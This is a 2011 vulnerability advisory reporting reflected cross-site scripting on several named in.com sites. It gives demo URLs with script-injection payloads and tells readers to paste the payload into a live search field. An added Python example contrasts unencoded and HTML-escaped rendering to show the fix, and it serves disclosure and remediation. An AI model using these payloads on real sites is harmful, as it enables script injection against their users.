# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th July, 2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# link: http://shadowrootkit.wordpress.com/
# Google Dork: © Copyright 2010, Business.in.com
************************************************************
{DEMO} :
http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E
EXPLOIT: ">
{DEMO} :
http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E
EXPLOIT: ">
{DEMO} :
http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E
EXPLOIT: ">
Reflected XSS in connect.in.com
Inject the EXPLOIT below into the search field at http://connect.in.com
and observe a pop-up saying r007k17.
{DEMO} : http://connect.in.com
EXPLOIT: ">
************************************************************
sp3c14l Thanks to s1d3^effects and my friends@!3.14--
************************************************************
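
Added example (not part of the original advisory): it renders the search terms from the demo URLs above with and without HTML encoding and parses the result, to show what the fix on the server side has to achieve. The input template is a constructed assumption, since the sites' markup is not shown; the leading `">` in every term suggests the value is echoed into a quoted attribute.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Demo URLs copied from the advisory above.
DEMO_URLS = [
    "http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E",
    "http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E",
    "http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E",
]

# Constructed template (assumption): the sites' real markup is not in the advisory.
TEMPLATE = '<input type="text" name="q" value="{value}">'

def search_term(url):
    """URL-decode the single query parameter, as the server receives it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return next(iter(params.values()))[0]

def render_unsafe(term):
    """Vulnerable pattern: the term is pasted into the attribute unencoded."""
    return TEMPLATE.format(value=term)

def render_safe(term):
    """Hardened pattern: encode & < > " ' before writing into the attribute."""
    return TEMPLATE.format(value=html.escape(term, quote=True))

class _Collector(HTMLParser):
    """Records every start tag and the value attribute of the <input>."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.value = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")

def parse_tags(markup):
    """Tokenise markup with Python's HTML parser; return (tags, input value)."""
    parser = _Collector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.value

if __name__ == "__main__":
    for url in DEMO_URLS:
        term = search_term(url)
        print(urlsplit(url).netloc, parse_tags(render_unsafe(term)), parse_tags(render_safe(term)))
```

With encoding in place the parser sees a single `input` element whose value is the literal search term; without it, the attribute is empty and a separate `script` element appears.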